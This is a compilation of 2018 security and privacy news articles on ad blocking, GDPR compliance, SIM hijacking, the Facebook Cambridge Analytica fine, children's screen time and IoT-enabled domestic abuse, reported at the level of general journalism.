  • Secondary Browser(s): Chromium / Internet Explorer without protections
  • Browser Extensions:
      Adblock Plus: Adblock Warning Removal List, Facebook annoyances blocker, NoCoin Filter List
      uBlock Origin: uBlock filters, uBlock filters – Badware risks, uBlock filters – Privacy, uBlock filters – Resource abuse, uBlock filters – Unbreak, EasyList, EasyPrivacy, Fanboy’s Enhanced Tracking List, Malware Domain List, Malware domains, Fanboy’s Annoyance List, Fanboy’s Anti-Third-party Social, Fanboy’s Cookiemonster List, Fanboy’s Social Blocking List, Peter Lowe’s Ad and tracking server list
      Privacy Badger (not covered)
      Decentraleyes (not covered)

Mobile

  • Default Browser: Mozilla Firefox with ad blocking protections
  • Secondary Browser(s): Opera (currently, but this changes) without protections
  • Google Chrome: Rooted & Removed
  • Browser Extensions:
      uBlock Origin: uBlock filters, uBlock filters – Badware risks, uBlock filters – Privacy, uBlock filters – Resource abuse, uBlock filters – Unbreak, Adguard Mobile Filters, EasyList, EasyPrivacy, Fanboy’s Enhanced Tracking List, Malware Domain List, Malware domains, Peter Lowe’s Ad and tracking server list
      NoScript
      Decentraleyes (not covered)
  • Though not in my current setup, Ghostery deserves a shout-out. Users might consider giving it a try also.

These tools help to maintain a relatively ad-free experience, limit my exposure to privacy-invading trackers and online threats, and along with well-defined personal filter lists, help keep my favorite websites running smoothly and efficiently. Taken together (and considering the nifty calculation provided by uBlock), I’d estimate that anywhere from 18 to 33 percent of total traffic is blocked due to unwanted or unapproved content.

This concludes our series, “Everybody and their mother is blocking ads, so why aren’t you?”. We hope you are coming away with a better understanding of how online advertisements pose a threat to your online security and how trackers can jeopardize your personal privacy. You should now have the knowledge of why it’s important to block advertisements on your devices, and the know-how to create a robust and successful ad-blocking policy within your network and for your devices. Most importantly, we hope we’ve given you the tools and the empowerment to take back control of your browsing experience and to block ads in your own environment—just like the pros.

 This post reflects the opinion of the writer, serving as a review of the tools available to block online advertisements. Malwarebytes has no affiliations with and does not endorse any of the companies or tools listed in this write-up. 

The post How to block ads like a pro appeared first on Malwarebytes Labs.

Smashing Security #087: How Russia hacked the US election

Regardless of whether Donald Trump believes Russia hacked the Democrats in the run-up to the US Presidential election or not, we explain how they did it. And Carole explores some of the creepier things being done in the name of surveillance.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault.

Robocall Firm Exposes Hundreds of Thousands of US Voters’ Records

An anonymous reader shares a report: RoboCent, a Virginia Beach-based political robocall firm, has exposed the personal details of hundreds of thousands of US voters, according to the findings of a security researcher who stumbled upon the company's database online. The researcher, Bob Diachenko of Kromtech Security, says he discovered the data using a recently launched online service called GrayhatWarfare that allows users to search publicly exposed Amazon Web Services data storage buckets. Such buckets should never be left exposed to public access, as they could hold sensitive data.

Read more of this story at Slashdot.

Digital Strategy Isn’t Meeting Security Needs — Here’s What to Do

We are in the midst of a digital transformation. And yet, IT departments are struggling to develop a digital strategy that addresses data privacy and cybersecurity. In a world where the General Data Protection Regulation (GDPR) is now in effect, the lack of such a strategy could end up coming back to haunt your organization and its leadership.

The Greatest Challenge Facing Digital Strategy Leadership

According to a June 2018 Harvey Nash/KPMG CIO Survey, the greatest challenge facing security and information technology leadership is the ability to deliver dynamic data while simultaneously providing a high level of security and privacy.

Only 32 percent of organizations have a company-wide digital strategy, the same survey found, and of those, 78 percent admit that the strategy in place is moderately effective at best. These insights imply that all of the data transmitted through organizations, including the personal information of customers, isn’t getting the level of protection necessary or satisfying GDPR compliance.

Jumping Into the Digital Transformation Too Fast

Let’s face it, most companies are failing or falling behind when it comes to cybersecurity — and the ongoing digital transformation is only exacerbating the situation. The Harvey Nash/KPMG survey states that IT departments are doing fine when it comes to traditional technologies, but it also recognizes the increasing complexity that digital technologies bring to organizations.

Understanding these technologies is part of the problem — not only how they work, but also how they’ll best improve the nature of the business. It might be tempting to apply the latest and greatest available technology, whether you need it or not.

IT staff are often risk-takers — they like new technology and want to use it right away. Where they run into trouble is bringing in the latest technology without a real strategy to implement it both wisely and securely. Just because IT wants to update its technology doesn’t mean the company is ready for it.

Too Much Data, Not Enough Security

Understanding how a technology’s abilities intersect (or don’t) with a business’s needs makes the difference between a successful transformation and a digital nightmare. Whether the technology is a boon or a bust for the company, there is one thing it is guaranteed to do: generate more data — which will require layers of security. Without an effective digital strategy, understanding and protecting that data becomes problematic.

If the data were stored in one location, it might be easier to manage. But with the increasing diversity of technologies, from the Internet of Things (IoT) and cloud computing to blockchain and virtual reality (VR), databases for a single company are spread across thousands of endpoints. This reality leads to an increased risk of data breaches.

“[W]ith the emergence of these transformative technologies the perimeter has become dynamic and ever-changing,” wrote Peter Galvin, chief strategy and marketing officer at Thales eSecurity. “[W]hile protecting the perimeter is still important, it simply is not enough to prevent sensitive data from being stolen.”

Getting Leadership on Board

A strong digital strategy will provide the layers of security and privacy needed in the digital transformation, but this requires cooperation from all levels of leadership. Just as IT departments have a responsibility to be more business-aware and recognize how new technologies fit (or don’t fit) into corporate strategies, boards of directors must be more realistic about creating digital strategies that will meet today’s and tomorrow’s privacy concerns.

In the past, the fallout from data breaches and other security incidents fell directly on C-suite employees: Chief executive officers (CEOs), chief information officers (CIOs) and chief information security officers (CISOs) have been held accountable by directors. However, the responsibility often falls on the board to approve budgets, support cybersecurity funding and efforts and create corporate strategies.

Thanks to GDPR — and rising security and privacy threats — boards may finally be getting the message. The Harvey Nash/KPMG survey found that boardrooms are increasingly prioritizing security. In fact, security has received the most significant increase in business priority over the past year.

And according to Board Effect, more boards are expanding to bring cybersecurity experts directly to the table as full members.

“Cybersecurity experts on the board have the proper expertise to advise the board about the best tools, processes and resources to keep hackers at bay,” the publication stated. “In addition, cybersecurity experts are the prime resource people for identifying new developments in IT as technology advances.”

This shift is promising for security professionals. With a digital perspective integrated directly into board decisions, IT departments should gain the leverage necessary to lobby for tools and support they need to meet the digital transformation with an adequate strategy to keep data secure.

Read the study from Ponemon Institute: Bridging the Digital Transformation Divide

The post Digital Strategy Isn’t Meeting Security Needs — Here’s What to Do appeared first on Security Intelligence.

How to Navigate Business Ethics in a Data-Hungry Digital World

In this data-hungry world, high-profile breaches continue to make headlines. As global corporations and technology giants continue to collect enormous amounts of personal information, legislators and consumers are starting to ask pointed questions about business ethics.

Even when companies aren’t directly profiting from sharing their users’ personal information, they often fail to protect what they have. Consumers have begun to realize that what they read, who they engage with, what they buy — and even the pictures they share online — are all data monetized.

The critical question: Do the businesses who profit from the use of this personal data have integrity? If not, what needs to change to achieve ethical business practices?

How to Define Business Ethics in a Digital World

In general, ethics is a gray area. As different entities emerge — and the players evolve — ideas about right and wrong shift. Therefore, the goal for businesses must be to find a starting point, explained Jason Tan, CEO and co-founder of machine learning company Sift Science, to SecurityIntelligence.

“Each business needs to define for itself a clear North Star of what is right and what is wrong,” Tan said. “That doesn’t have to get into the nitty-gritty of what is right and wrong — but establish a baseline of what they want for a cultural mindset so that everyone is guided by the principle of doing the right thing as much as possible.”

Unfortunately, the “right thing” is often unclear. Since the General Data Protection Regulation (GDPR) went into effect, consumers’ inboxes have been flooded with emails updating them about privacy policy changes.

There’s a greater issue, however: Even when it comes to privacy policy and terms of service agreements, “users enter into legal agreements that are often difficult or impossible for the everyday person to understand,” Tan said.

While that’s not unethical, per se, it does err on the side of what is not right for the users.

“We think of business ethics as the set of values that a company uses to make decisions with an eye to all of its different stakeholder groups — employees, customers, value chain partners, investors, the communities in which it operates — and the impact the decision might have upon them,” said Erica Salmon Byrne, executive vice president at the Ethisphere Institute, to SecurityIntelligence.

Navigate Changes in Technology With a Moral Compass

Rapid changes in technology have impacted the speed with which businesses need to react, especially since the effects of their decisions have an increasingly global reach. Ethical companies know who they are and what matters to them. Therefore, in times of crisis, they can rely on this moral compass to direct their responses.

To be an ethical company, organizations must recognize risks in the actions of their employees and the behaviors of the company itself. Examples include how they work with personal data, other company information or trade secrets.

Businesses can instill this moral compass, one that won’t compromise the personal information used to make business-critical decisions, by clearly conveying what their expectations are and why they matter.

“Provide context to show how those expectations pertain to the area the employee is working in, provide trustworthy avenues to raise concerns and monitor and follow up where possible,” Byrne said. “… but at the end of the day, your controls are only as good as your people.”

Find True North

Another step toward ethical practice: draft user agreements that are clear, transparent and accessible. This strategy will help your users understand the rights they are transferring, a branch of communication that remains largely undeveloped.

“The norm for users is to never even look at the terms of service,” Tan said. “As a society, we want instant gratification quickly and effectively — so it is on the businesses to be thinking about how to make all this legalese more accessible to the everyday person to help them clearly understand what is happening.”
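One concrete way to act on this is to measure how accessible a terms-of-service text actually is. Below is a minimal sketch using the standard Flesch reading-ease formula; the naive vowel-group syllable counter is an illustrative assumption, not production-grade readability tooling:

```python
import re

def count_syllables(word: str) -> int:
    # Naive heuristic: one syllable per group of consecutive vowels.
    return max(1, len(re.findall(r"[aeiouy]+", word.lower())))

def flesch_reading_ease(text: str) -> float:
    # Flesch formula: 206.835 - 1.015*(words/sentence) - 84.6*(syllables/word).
    # Higher scores mean easier reading; plain English lands around 60-70.
    sentences = [s for s in re.split(r"[.!?]+", text) if s.strip()]
    words = re.findall(r"[A-Za-z’']+", text)
    syllables = sum(count_syllables(w) for w in words)
    return (206.835
            - 1.015 * (len(words) / len(sentences))
            - 84.6 * (syllables / len(words)))

plain = "We collect your name. We use it to ship your order."
legalese = ("Notwithstanding the aforementioned provisions, the undersigned "
            "hereby irrevocably relinquishes all entitlements thereunder.")
print(flesch_reading_ease(plain))     # high score: easy to read
print(flesch_reading_ease(legalese))  # low (even negative) score: hard to read
```

A business could run a check like this against each redraft of its terms of service and set a minimum readability threshold before publishing.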

All of these ideas are lofty — but mean little unless they are put into action. While some technology giants continue to seek redemption for their reported misuse of personal data, many companies pride themselves on their business ethics. As governments continue to respond to heightened concerns about protecting privacy, there will likely be more regulations that attempt to legislate the ethical behavior of businesses.

Byrne warned that in the midst of trying to comply with regulations, it’s often easy to forget what those regulations are trying to achieve.

“If the company has clear values, ties their policies and procedures to those values, takes the time to engage employees on the values and expectations and offers avenues to ask questions that employees feel secure in using, it will go a very long way towards mitigating the risk of improperly using or protecting data and lots of other risks too,” Byrne said.

Download the 2018 Cost of a Data Breach Study from Ponemon Institute

The post How to Navigate Business Ethics in a Data-Hungry Digital World appeared first on Security Intelligence.

The SIM Hijackers

Lorenzo Franceschi-Bicchierai of Motherboard has a chilling story on how hackers flip seized Instagram handles and cryptocurrency in a shady, buzzing underground market for stolen accounts and usernames. Their victim's weakness? Phone numbers. He writes: First, criminals call a cell phone carrier's tech support number pretending to be their target. They explain to the company's employee that they "lost" their SIM card, requesting their phone number be transferred, or ported, to a new SIM card that the hackers themselves already own. With a bit of social engineering -- perhaps by providing the victim's Social Security Number or home address (which is often available from one of the many data breaches that have happened in the last few years) -- the criminals convince the employee that they really are who they claim to be, at which point the employee ports the phone number to the new SIM card. Game over.

Read more of this story at Slashdot.

World powers equip, train other countries for surveillance

Privacy International has released a report that looks at how powerful governments are financing, training and equipping countries with surveillance capabilities. Countries with powerful security agencies are spending literally billions to equip, finance, and train security and surveillance agencies around the world — including authoritarian regimes. This is resulting in entrenched authoritarianism, further facilitation of abuse against people, and diversion of resources from long-term development programmes. Examples from the report include: In 2001, the US …

The post World powers equip, train other countries for surveillance appeared first on Help Net Security.

Why Consumers Demand Greater Transparency Around Data Privacy

Although consumers have a wide range of attitudes toward data privacy, the vast majority are calling for organizations to be more transparent about how they handle customer information, according to a July 2018 survey from the Direct Marketing Association.

Previous research has shown that many companies are not doing enough to communicate and clarify their data-handling policies to customers. Given these findings, what practices can organizations adopt to be more upfront with users and build customer trust?

How Important Is Data Privacy to Consumers?

The Direct Marketing Association survey sorted respondents into three categories:

  1. Data pragmatists (51 percent): Those who are willing to share their data as long as there is a clear benefit.
  2. Data unconcerned (26 percent): Those who don’t care how or why their data is used.
  3. Data fundamentalists (23 percent): Those who refuse to share their personal data under any circumstances.

It’s not just fundamentalists who see room for improvement when it comes to organizations’ data-handling practices. Eighty-two percent of survey respondents said companies should develop a flexible privacy policy — while 84 percent said they should simplify their terms and conditions. Most tellingly, 86 percent said organizations should be more transparent with users about how they engage with customer data.

There Is No Digital Trust Without Transparency

The results of a May 2018 study from Ranking Digital Rights (RDR), Ranking Digital Rights 2018 Corporate Accountability Index, suggest that consumers’ demands for more transparency are justified. Not one of the 22 internet, mobile and telecommunications companies surveyed for the study earned a privacy score higher than 63 percent, indicating that most organizations fail to disclose enough information about data privacy to customers.

Transparency is often a critical factor for consumers when deciding whether to establish digital trust with a company or service provider. According to IBM CEO Ginni Rometty, organizations can and should work to improve their openness by being clear about what they’re doing with users’ data. Those efforts, she said, should originate from companies themselves and not from government legislation.

“This is better for companies to self-regulate,” Rometty told CNBC in March 2018. “Every company has to be very clear about their data principles — opt in, opt out. You have to be very clear and then very clear about how you steward security.”

The post Why Consumers Demand Greater Transparency Around Data Privacy appeared first on Security Intelligence.

ENCRYPT Act: Consumer Privacy Vs Law Enforcement Data Access

The Consumer Technology Association (CTA) is supporting the proposed ENCRYPT Act, which would forbid technology manufacturers from weakening

ENCRYPT Act: Consumer Privacy Vs Law Enforcement Data Access on Latest Hacking News.

Zero login: Fixing the flaws in authentication

Passwords, birth certificates, national insurance numbers and passports – as well as the various other means of authentication that we have relied upon for the past century or more to prove who we are to others – can no longer be trusted in today’s digital age. That’s because the mishandling of these types of personally identifiable information (PII) documents from birth, along with a string of major digital data breaches that have taken place in …

The post Zero login: Fixing the flaws in authentication appeared first on Help Net Security.

Four Healthcare IT Companies Warn PHO Put 800K Patients’ Data at Risk

Four healthcare IT companies warned that a primary health organization (PHO) put up to 800,000 patients’ medical data at risk. On 17 July, New Zealand and Australian healthcare companies HealthLink, Medtech Global, myPractice and Best Practice Software New Zealand sent a letter to New Zealand’s Privacy Commissioner. In it, they explained how they learned in […]…

The post Four Healthcare IT Companies Warn PHO Put 800K Patients’ Data at Risk appeared first on The State of Security.

Family Tech Check: 5 Ways to Help Kids Balance Tech Over Summer Break

It’s mind-blowing to think that when you become a parent, you have just 18 summers with your child before he or she steps out of the mini-van and into adulthood. So at the mid-summer point, it’s a great time to ask: How balanced is your child’s screen time?

Don’t panic: it’s normal for screen time to spike over the summer months, which is why it’s important that kids not only know how to balance their screen time but also understand why that balance matters.

Besides impacting family time and relationships, excessive screen time carries other potential risks such as obesity, depression, technology addiction, and anxiety. There are also online safety risks, including loss of privacy, cyberbullying, inappropriate content, and predators. So, while summer brings fun, it also requires parents to be even more diligent — and creative — when it comes to helping kids achieve some degree of balance with their tech.

A Small, Powerful Step

Kids are connected. Forever. There’s no going backward. Not all changes take a huge effort. Small changes matter.

Try this one small but powerful change. Turn your phone over whenever anyone in your family enters a room or begins talking to you. The simple act of turning our screens face down and looking at the person speaking strengthened our family dynamic. Try it — you might experience some of the same results we did. The kids may stick around and talk longer. Your spouse may feel more respected. And, most importantly, you won’t miss the priceless smiles, expressions, laughter, and body language that comes with eye contact and being fully present with the people who mean the most.

Another small step is agreeing to screen-free zones (this includes TV) such as the dinner table, restaurants, and family outings. Again, this one small step might open up a fresh, fun family dynamic.

If you feel your summer slip-sliding away and need to seriously pull in the tech reins, these five tips may help.

5 Ways to Help Curb Summer Tech

  1. Create summer ground rules. Include your kids in this process and come up with a challenge rather than a list of rules. Ground rules for summer might look different from the rest of the year, depending on your family’s schedule. Establishing a plan for chores, exercise, reading and waking up puts expectations in place. To keep the tech in check, consider a tech exchange: for every hour of screen time, require your child to do something else productive. Keep it fun: Set up a reward system for completed chores.
  2. Get intentional with time. Carving out time to be together in our tech-driven world requires intentionality. Try sitting down together and making a bucket list for the remainder of the summer. Try your hand at fishing, canoeing, or hiking some new trails together. Board games, crafts, puzzles, and family projects are also great ways to make memories.
  3. Keep up with monitoring. Just because it’s summer doesn’t mean monitoring online activity should go by the wayside. Keep up with your child’s favorite apps and understand how he or she is using them. During summer especially, know the friends your kids connect with online. Review privacy and location settings. Note: Kids — especially teens — want their friends to know what they are doing and where they are at all times in hopes of finding something to do over the summer. This practice isn’t always a good idea since location-based apps can open your family up to risks.
  4. Consider a tech curfew. Establish a “devices off” rule starting an hour before lights out. This won’t be a favorite move, but then again, parenting well isn’t always fun. More and more studies show the physical toll excessive technology use can take on teens. Just because your child is in bed at night does not mean he or she is asleep. The ability to video chat, text, watch movies, or stream YouTube videos can deprive kids of valuable sleep.
  5. Maintain a balanced perspective. Kids and tech are intertwined today, which makes it nearly impossible to separate the two. Sure the risks exist, but there’s the upside of tech that brings values that echo throughout every generation: Friendship, connection, and affirmation. Checking social media and sharing one’s thoughts and life online is a regular part of growing up today. Keep this in mind as you work together to find the balance that works best for your family.

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post Family Tech Check: 5 Ways to Help Kids Balance Tech Over Summer Break appeared first on McAfee Blogs.

Only 20% of companies have fully completed their GDPR implementations

Key findings from a survey conducted by Dimensional Research highlight that only 20% of companies surveyed believe they are GDPR compliant, while 53% are in the implementation phase and 27% have not yet started their implementation. EU (excluding UK) companies are further along, with 27% reporting they are compliant, versus 12% in the U.S. and 21% in the UK. While many companies have significant work to do, 74% expect to be compliant by the end …

The post Only 20% of companies have fully completed their GDPR implementations appeared first on Help Net Security.

U.S. Senators Ask FTC to Launch Privacy Investigation of Smart TVs

Two United States Senators asked the Federal Trade Commission (FTC) to investigate the privacy policies and practices of smart TV manufacturers. In mid-July, Senators Edward Markey (D-MA) and Richard Blumenthal (D-CT) submitted a letter to Joseph Simons, Chairman of the FTC, asking him to open an investigation. To support their argument for an FTC review, […]…

The post U.S. Senators Ask FTC to Launch Privacy Investigation of Smart TVs appeared first on The State of Security.

Judge Jails Defendant For Failing To Unlock Phones

devoid42 writes: In a Tampa courtroom, Judge Gregory Holder held William Montanez in contempt of court for failure to unlock a mobile device. What led to this was a frightening slippery slope that threatens our Fourth Amendment rights to the core. Montanez was stopped for failing to yield properly. After being pulled over, the officer asked to search his car; Montanez refused, so the officer held him until a drug dog was brought in to give the officer enough probable cause to search the vehicle. They found a misdemeanor amount of marijuana, which they used to arrest Montanez, but they asked to search his two cellphones, which he also refused. They were able to secure a warrant for those as well, but Montanez claimed he had forgotten his password. The result: Montanez is being held in contempt of court and is serving a six-month jail sentence.

Read more of this story at Slashdot.

Think You’ve Got Nothing to Hide? Think Again — Why Data Privacy Affects Us All

We all hear about privacy, but do we really understand what this means? According to privacy law expert Ronald B. Standler, privacy is “the expectation that confidential personal information disclosed in a private place will not be disclosed to third parties when that disclosure would cause either embarrassment or emotional distress to a person of reasonable sensitivities.”

It’s important to remember that privacy is about so much more than money and advertisements — it ties directly to who we are as individuals and citizens.

What Is the Price of Convenience?

Most users willingly volunteer personal information to online apps and services because they believe they have nothing to hide and nothing to lose.

When I hear this reasoning, it reminds me of stories from World War II in which soldiers sat on the sideline when the enemy was not actively pursuing them. When the enemy did come, nobody was left to protect the soldiers who waited around. That’s why it’s essential for all users to take a stand on data privacy — even if they’re not personally affected at this very moment.

Some folks are happy to disclose their personal information because it makes their lives easier. I recently spoke to a chief information security officer (CISO) and privacy officer at a major unified communications company who told me about an employee who willingly submitted personal data to a retail company because it streamlined the online shopping experience and delivered ads that were targeted to his or her interests.

This behavior is all too common today. Let’s dive deeper into some key reasons why privacy should be top of mind for all users — even those who think they have nothing to hide.

How Do Large Companies Use Personal Data?

There is an ongoing, concerted effort by the largest technology companies in the world to gather, consume, sell, distribute and use as much personal information about their customers as possible. Some organizations even market social media monitoring tools designed to help law enforcement and authoritarian regimes identify protesters and dissidents.

Many of these online services are free to users, and advertising is one of their primary sources of revenue. Advertisers want high returns per click, and the best way to ensure high conversion rates is to directly target ads to users based on their interests, habits and needs.

Many users knowingly or unknowingly provide critical personal information to these companies. In fact, something as simple as clicking “like” on a friend’s social media post may lead to new ads for dog food.

These services track, log and store all user activity and share the data with their advertising partners. Most users don’t understand what they really give up when technology firms consume and abuse their personal data.

Advanced Technologies Put Personal Data in the Wrong Hands

Many DNA and genomics-analysis services collect incredibly detailed personal information about customers who provide a saliva-generated DNA sample.

On the surface, it’s easy to see the benefit of submitting biological data to these companies — customers get detailed reports about their ancestry and information about potential health risks based on their genome. However, it’s important to remember that when users volunteer data about their DNA, they are also surrendering personal information about their relatives.

Biometrics, facial recognition and armed drones present additional data-privacy challenges. Governments around the world have begun using drones for policing and crowd control, and even the state of North Dakota passed a law in 2015 permitting law enforcement to arm drones with nonlethal weapons.

Facial recognition software can also be used for positive identification, which is why travelers must remove their sunglasses and hats when they go through immigration control. Law enforcement agencies recently started using drones with facial recognition software to identify “potential troublemakers” and track down known criminals.

In the U.S., we are innocent until proven guilty. That’s why the prospect of authorities using technology to identify potential criminals should concern us all — even those who don’t consider privacy to be an important issue in our daily lives.

Who Is Responsible for Data Privacy?

Research has shown that six in 10 boards consider cybersecurity risk to be an IT problem. While it’s true that technology can go a long way toward helping organizations protect their sensitive data, the real key to data privacy is ongoing and companywide education.

According to Javelin Strategy & Research, identity theft cost 16.7 million victims $16.8 billion in the U.S. last year. Sadly, this has not been enough to push people toward more secure behavior. Since global regulations and company policies often fall short of protecting data privacy, it’s more important than ever to understand how our personal information affects us as consumers, individuals and citizens.

How to Protect Personal Information

The data privacy prognosis is not all doom and gloom. We can all take steps to improve our personal security and send a strong message to governments that we need more effective regulations.

The first step is to lock down your social media accounts to limit the amount of personal information that is publicly available on these sites. Next, find your local representatives and senators online and sign up to receive email bulletins and alerts. While data security is a global issue, it’s important to keep tabs on local legislation to ensure that law enforcement and other public agencies aren’t misusing technology to violate citizens’ privacy.

Lastly, don’t live in a bubble: Even if you’re willing to surrender your data privacy to social media and retail marketers, it’s important to understand the role privacy plays in day-to-day life and society at large. Consider the implications to your friends and family. No one lives alone — we’re all part of communities, and we must act accordingly.

The post Think You’ve Got Nothing to Hide? Think Again — Why Data Privacy Affects Us All appeared first on Security Intelligence.

Want to avoid GDPR fines? Adjust your IT procurement methods

Gartner said many organizations are still not compliant with GDPR legislation even though it has been in force since May 2018. This is because they have not properly audited data handling within their supplier relationships. Sourcing and vendor management (SVM) leaders should, therefore, review all IT contracts to minimise potential financial and reputation risks. “SVM leaders are the first line of defense for organizations whose partners and suppliers process the data of EU residents on …

The post Want to avoid GDPR fines? Adjust your IT procurement methods appeared first on Help Net Security.

Facebook faces £500,000 fine in the U.K. over Cambridge Analytica scandal

Facebook has been fined £500,000 ($664,000) in the U.K. for its conduct in the Cambridge Analytica privacy scandal.

Facebook has been fined £500,000 in the U.K., the maximum fine allowed by the UK’s Data Protection Act 1998, for failing to protect users’ personal information.

Political consultancy firm Cambridge Analytica improperly collected data of 87 million Facebook users and misused it.

“Today’s progress report gives details of some of the organisations and individuals under investigation, as well as enforcement actions so far.

This includes the ICO’s intention to fine Facebook a maximum £500,000 for two breaches of the Data Protection Act 1998.” reads the announcement published by the UK Information Commissioner’s Office.

“Facebook, with Cambridge Analytica, has been the focus of the investigation since February when evidence emerged that an app had been used to harvest the data of 50 million Facebook users across the world. This is now estimated at 87 million.

The ICO’s investigation concluded that Facebook contravened the law by failing to safeguard people’s information. It also found that the company failed to be transparent about how people’s data was harvested by others.”

This is the first potential financial penalty Facebook is facing for the Cambridge Analytica scandal.

“A significant finding of the ICO investigation is the conclusion that Facebook has not been sufficiently transparent to enable users to understand how and why they might be targeted by a political party or campaign,” reads ICO’s report.

Obviously, the financial penalty is negligible compared to the revenues of the social network giant, but it sends a strong message to every company that must properly manage users’ personal information in compliance with the new General Data Protection Regulation (GDPR).

What would have happened if the regulation had already been in force at the time of disclosure?

Under the GDPR, the penalties are much greater: fines can reach up to 4% of global annual turnover, which in Facebook’s case would amount to an estimated $1.9 billion.
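For reference, Article 83(5) of the GDPR caps administrative fines at the greater of €20 million or 4% of total worldwide annual turnover. A minimal sketch of that arithmetic (the function name is illustrative, and the ~$47.5 billion turnover implied by the $1.9 billion figure is an assumption; currency units are taken as consistent):

```python
def gdpr_fine_cap(global_annual_turnover: float, flat_cap: float = 20_000_000) -> float:
    """GDPR Art. 83(5): the maximum fine is the greater of 20 million
    (EUR) or 4% of total worldwide annual turnover."""
    return max(flat_cap, 0.04 * global_annual_turnover)

# The reported $1.9 billion figure implies roughly $47.5 billion in turnover:
print(gdpr_fine_cap(47_500_000_000))  # ~1.9 billion
# A small firm falls back to the flat 20 million cap:
print(gdpr_fine_cap(100_000_000))     # 20 million
```

Compare that ceiling to the £500,000 maximum under the Data Protection Act 1998 to see why the timing of the breach matters so much.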

“Facebook has failed to provide the kind of protections they are required to under the Data Protection Act.” Elizabeth Denham, the UK’s Information Commissioner said. “People cannot have control over their own data if they don’t know or understand how it is being used. That’s why greater and genuine transparency about the use of data analytics is vital.” 

Facebook still has a chance to respond to the ICO’s Notice of Intent before a final decision on the fine is made.

“In line with our approach, we have served Facebook with a Notice setting out the detail of our areas of concern and invited their representations on these and any action we propose,” concludes the ICO update on the investigation published today by Information Commissioner Elizabeth Denham.

“Their representations are due later this month, and we have taken no final view on the merits of the case at this time. We will consider carefully any representations Facebook may wish to make before finalising our views,”

Pierluigi Paganini

(Security Affairs – Facebook, Cambridge Analytica)

The post Facebook faces £500,000 fine in the U.K. over Cambridge Analytica scandal appeared first on Security Affairs.

Smashing Security #086: Elon Musk submarine scams and 2FA bypass

Crypto scamming Thai cave scoundrels! $25 million to make anti-fake news videos! TimeHop data breach! Phone number port out scams!

All this and much much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by B J Mendelson.

IoT domestic abuse: What can we do to stop it?

Some 40 years ago, the sci-fi/horror film Demon Seed told the tale of a woman slowly imprisoned by a sentient AI, which invaded the smart home system her husband had designed to manage the house. The AI locked doors and windows, turned off communications, and even put a synthesised version of her onscreen at the front door to reassure visitors she was “fine.”

The reality, of course, is that she was anything but. There have been endless works of fiction in which smart technology micromanaging the home environment goes rogue. Sadly, those works of fiction are bleeding over into reality.

In 2018, we suddenly have the real-world equivalent playing out in homes and behind closed doors. We’ll talk about the present-day problems momentarily, but first let’s take a look at how we got here by casting our eye back about 15 years ago.

PC spyware and password theft

For years, a subset of abusive partners with technical know-how have placed spyware on computers or mobile devices, stolen passwords, and generally kept tabs on their other half. This could often lead to violence, and as a result, many strategies for defending against this have been drawn up down the years. I effectively became involved in security due to a tech-related abuse case, and I’ve given many talks on this subject dating back to 2006 alongside representatives from NNEDV (National Network to End Domestic Violence).

Consumer spyware is a huge problem, and tech giants such as Google are funding programs designed to help abused spouses out of technological abuse scenarios.

The mobile wave and social control

After PC-based spyware became a tool of the trade for abusers, there came an upswing in “coercive control,” the act of demanding to check emails, texts, direct messages and more sent to mobile phones. Abusive partners demanding to see SMS messages has always been a thing, but taking your entire online existence and dumping it into a pocket-sized device was always going to raise the stakes for people up to no good.

Coercive control is such a serious problem that the UK has specific laws against it, with the act becoming a crime in 2015. Should you be found guilty, you can expect to find yourself looking at a maximum of five years imprisonment, or a fine, or both in the worst cases. From the description of coercive control:

Coercive or controlling behaviour does not relate to a single incident, it is a purposeful pattern of incidents that occur over time in order for one individual to exert power, control, or coercion over another.

Keep the “purposeful pattern of incidents occurring over time in order for an individual to exert power or control” description in mind as we move on to the next section about Internet of Things (IoT) abuse, because it’s relevant.

Internet of Things: total control

An Internet of Things control hub could be a complex remote cloud service powering a multitude of devices, but for most people, it’s a device that sits in the home and helps to power and control appliances and other systems, typically with some level of Internet access and the possibility of additional control via smartphone. It could just be in charge of security cameras or motion sensors, or it might be the total package: heating and cooling, lighting, windows, door locks, fire alarms, ovens, water temperature—pretty much anything you can think of.

It hasn’t taken long for abusive partners to take advantage of this newly-embedded functionality, with numerous tales of them making life miserable for their loved ones, effectively trapped in a 24/7 reworking of a sci-fi dystopian home.

Their cruelty is only limited by what they can’t hook into the overall network. Locking the spouse into their place of residence then cranking up the heat, blasting them with cold, flicking lights on and off, disabling services, recording conversations, triggering loud security alarms; the abused partner is almost entirely at their mercy.

There are all sorts of weird implications thrown up by this sort of real-world abuse of technologies and individuals. What happens if someone has an adverse reaction to severe temperature change? An epileptic fit due to rapidly flickering lights? How about someone turning off smoke alarms or emergency police response technology and then the place burns down or someone breaks in?

Someone could well be responsible for a death, but how would law enforcement figure it out, much less know where to pin the blame?

Of course, those are situations where spouses are still living together. There are also scenarios where the couple has separated, but the abuser still has access to the IoT tech and proceeds to mess with the survivor's life remotely. One situation is somewhat more straightforward to address than the other, but neither is pleasant for the person on the receiving end.

A daunting challenge

Unfortunately, this is a tough nut to crack. Generally speaking, advice given to survivors of domestic abuse tends to err on the side of extreme caution, because if the abuser notices the slightest irregularity, they’ll seek retribution. With computers and more “traditional” forms of tech-based skullduggery, there are usually a few slices of wiggle room.

For example, an abused partner may have a mobile device, which is immediately out of reach from the abuser the moment they go outside—assuming they haven’t tampered with it. On desktop, Incognito mode browsing is useful, as are domestic abuse websites which offer tips and fast close buttons in case the abuser happens to be nearby.

Even then, though, there’s risk: the abuser may keep network logs or use surveillance software, and attempts to “hide” the browsing data may raise suspicions. In fact, this is one area where the web's gradual move to HTTPS is beneficial, because an abuser monitoring the network can't read the page contents. Even so, they may still see which domains were visited, and then you're back to square one.

With IoT, everything is considerably more difficult in domestic abuse situations.

A lot of IoT tech is incredibly insecure because functionality is where it’s at; security, not so much. That’s why you see so many stories about webcams beamed across the Internet, or toys doing weird things, or the occasional Internet-connected toaster going rogue.

The main hubs powering everything in the home tend to be pretty locked down by comparison, especially if they’re a name brand like Alexa or Nest.

In these situations, the more locked down the device, the more difficult it is to suggest evasion strategies for people under threat. They can hardly start secretly tampering with the technology without notice; people tend to spot a physical device misbehaving far faster than they'd spot a covert piece of spyware grabbing emails from a laptop.

